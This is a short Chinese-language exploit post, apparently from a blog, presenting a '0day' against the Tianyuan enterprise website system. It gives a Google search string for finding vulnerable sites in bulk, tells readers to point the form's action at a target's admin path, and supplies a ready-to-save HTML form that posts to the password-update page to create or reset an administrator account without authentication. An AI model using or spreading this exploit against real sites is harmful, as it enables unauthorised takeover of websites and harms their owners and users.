天缘企业网站系统通杀0day
From 情Blog
批量www.google.cn
inurl:Products.asp?main_id=1
自己注意找下后台,然后修改action=“”里的地址
EXp:
<form name="administrator_add" method="post" id="password" action="http://127.0.0.1/manage/main/password_update_pass.asp?id=1" onSubmit="return check()">
<span class="right_body">
</span>
<table width="99%" border="0" align="center" cellpadding="0" cellspacing="1" class="table">
<tr>
<th width="240" class="td">请输入你要创建管理员的名字</th>
<td class="td"><input name="user_name" type="text" class="input" size="30" /></td>
</tr>
<tr>
<th class="td">请输入你要创建管理员的密码</th>
<td class="td"><input name="password" type="password" class="input" id="password" size="30" /></td>
</tr>
<tr>
<th class="td">这个当然是确认密码了</th>
<td class="td"><input name="password_again" type="password" class="input" id="password_again" size="30" /></td>
</tr>
<tr>
<td colspan="2" class="td"><p class="submit">
<input name="submit" type="submit" class="button" value="添加管理员" />
</p></td>
</tr>Author:Lan3a
</table>
</form>
<!-- inurl:Products.asp?main_id=1 -->
<!-- 天缘企业网站系统通杀0day -->
以上代码 保存为html或htm